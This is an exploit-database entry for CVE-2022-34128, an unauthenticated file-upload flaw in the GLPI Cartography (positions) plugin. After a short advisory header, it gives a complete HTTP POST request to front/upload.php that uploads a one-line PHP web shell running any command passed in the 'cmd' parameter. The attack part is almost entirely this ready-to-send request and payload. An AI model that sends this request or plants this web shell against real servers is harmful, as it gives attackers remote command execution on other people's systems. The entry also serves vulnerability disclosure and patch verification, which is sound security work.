Headline
GLPI Cartography Shell Upload
GLPI Cartography versions prior to 6.0.0 suffers from a remote shell upload vulnerability.
# Exploit Title: GLPI Cartography Plugin v6.0.0 - Unauthenticated Remote Code Execution (RCE)# Date of found: 11 Jun 2022# Application: GLPI Cartography < 6.0.0# Author: Nuri Çilengir # Vendor Homepage: https://glpi-project.org/# Software Link: https://github.com/InfotelGLPI/positions# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/# Tested on: Ubuntu 22.04# CVE: CVE-2022-34128# PoCPOST /marketplace/positions/front/upload.php?name=poc.php HTTP/1.1Host: 192.168.56.113User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Length: 39Origin: http://192.168.56.113Connection: close<?php echo system($_GET["cmd"]); ?>Related news
CVE-2022-34128: Unauthenticated Remote Code Execution Due to Unrestricted File Upload
The Cartography (aka positions) plugin before 6.0.1 for GLPI allows remote code execution via PHP code in the POST data to front/upload.php.